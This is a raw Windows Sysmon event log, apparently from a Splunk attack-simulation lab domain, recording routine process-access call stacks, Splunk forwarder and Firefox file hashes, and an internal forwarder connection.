07:55:12.094{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.092{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.092{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.092{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.092{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.091{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.091{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:12.090{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.587{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23D58D6B25AAF92B7469DBD4829745E2,SHA256=7005A460B8B4B94580D206E7ADC1F9071A05FBCF77E1326102E1B327FD3EAE97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808058Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:13.132{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=621D19A71682FBE8413C1B9A8ADAE94E,SHA256=1A1BB8F327138CA3734630065553A56C77DAABAA6B89CD5E63EB9B19C56ADD41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5DE6E2552C6990C5C99995E2E98D5850,SHA256=C5C20516F630A2EFC0AB400077A2C5831EAC0054EF8A2A5D0DA8139CF248D68C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BFB7A60568BAD93FEEDDD5811B279FCC,SHA256=41E505FDC8079702E1C2991BDFE1378F44D1A95BB59E1C4BA0F8834B73AF93CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F1A35B9FA106FE44AB3B126229A97131,SHA256=239EBA12DC2C809D5A12BDC958C2BC07E8FA2F000AE3E8F0B55E2D480D8DDEB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=899E56C79EF305E4689018984B72C959,SHA256=A67CE4058D80CE6395A1A2C008F241C7DAB21A973642CB15A2DFC5E8E529940D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=184141C828157B13D27FA11C646362D6,SHA256=E17C4938E7821F11E518237CB95F0F1BCB9ABB97863605B4BF2564458C4FB30F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5E6BA370807AE2B7F970520C918F77FA,SHA256=6E919EEA103CCBC4BE1BBD76F1E01721AD78FD0BF8B5C3C8F2D77F922C50116F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050072Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=64214F24100FF268509847B760196229,SHA256=4D675E714D62A239A82616FBF820C0BD499F7FAC4ACF31DB581FCC8E146D1464,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050071Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1F56D37D26C9ED260E7BC90045D143FA,SHA256=7AAF46F97527AF5AFCBB3DDD4D0E7D7129BB2A8F08AD439E7F1449C2E289BAC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050070Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1EA85D6A53C643BA3952370B8D1CE3BB,SHA256=57BA6998A616A03E70C110BF9F427F69E21EC9F0EB24496500F6FA41F1E9C02F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2B600C7D8A4D7DC0D59206B59BC621BB,SHA256=9F17FBA351C17712603040050C89A019A820E69B406E028D739B6455CCF337C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.403{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=75EA11E28191C39B7269B2500051751E,SHA256=6F48069D42F83FF47BD55069EB5995A176AA746A5DBB0D7407C5AF4972F9BFC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:13.121{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:04.764{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51069-false10.0.1.12-8000- 23542300x80000000000000001050080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:14.605{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=728DB7790BBACEEF276F8647F8093178,SHA256=15E79CB9A2DF35838B172AFC55C16C2C96EE6F783FBD7473DBEED1AA6939A093,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808059Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:14.147{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF23B6D1E5CD22C25F81175223B0D34C,SHA256=1E18A7B0C8410A26657EB68B72E0CC16B3A3D7012663DE0C475D86499C0CC4DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:15.609{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A099EED439B88C3DF47DDA50DB01988,SHA256=F1046E2F83A7C50D899A173B12723C07643E6EF14CA1006D525D30DBD0CD0542,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808060Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:15.190{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88B1DEF1A9DCDA71B7CC36A9C3027C5F,SHA256=4E242693B01475B1FF11B62F2E34463408299FAF3CB4D4E30D96A0578C8E99CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:15.431{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95F4E028F2513385B2A03A486B505647,SHA256=81AACA200B6975476B482923D83D3B2A05A671D3FF05BFBD2DC0F3F63860BA76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:15.431{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2461D2806B0B35F67086AAC98A80F36D,SHA256=E8F571BA9ECBE5E01B5874B7D3ECC0A5E43729E880CEC7D3E5F62A0FBCC3DAE8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.930{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001050100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.930{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001050099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:16.930{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001050098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 